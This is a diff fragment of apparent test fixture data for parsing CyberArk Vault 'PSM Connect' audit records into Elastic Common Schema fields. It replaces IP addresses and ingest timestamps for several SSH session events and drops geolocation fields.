- "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331144600Z", + "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -342,20 +324,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -379,7 +352,7 @@ }, "@timestamp": "2021-03-11T17:48:34.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -391,15 +364,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:48:34Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -412,20 +385,20 @@ "psmid": "PSMServer", "session_id": "f6acbf00-8291-11eb-b9ba-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:48:34", "desc": "PSM Connect" @@ -436,8 +409,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936272100Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331150400Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -460,20 +433,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -497,7 +461,7 @@ }, "@timestamp": "2021-03-11T17:54:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -509,15 +473,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:54:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -530,20 +494,20 @@ "psmid": "PSMServer", "session_id": "d8ff4d32-8292-11eb-b962-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:54:56", "desc": "PSM Connect" @@ -554,8 +518,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936274800Z", - "original": "\u003c5\u003e1 2021-03-11T17:54:56Z 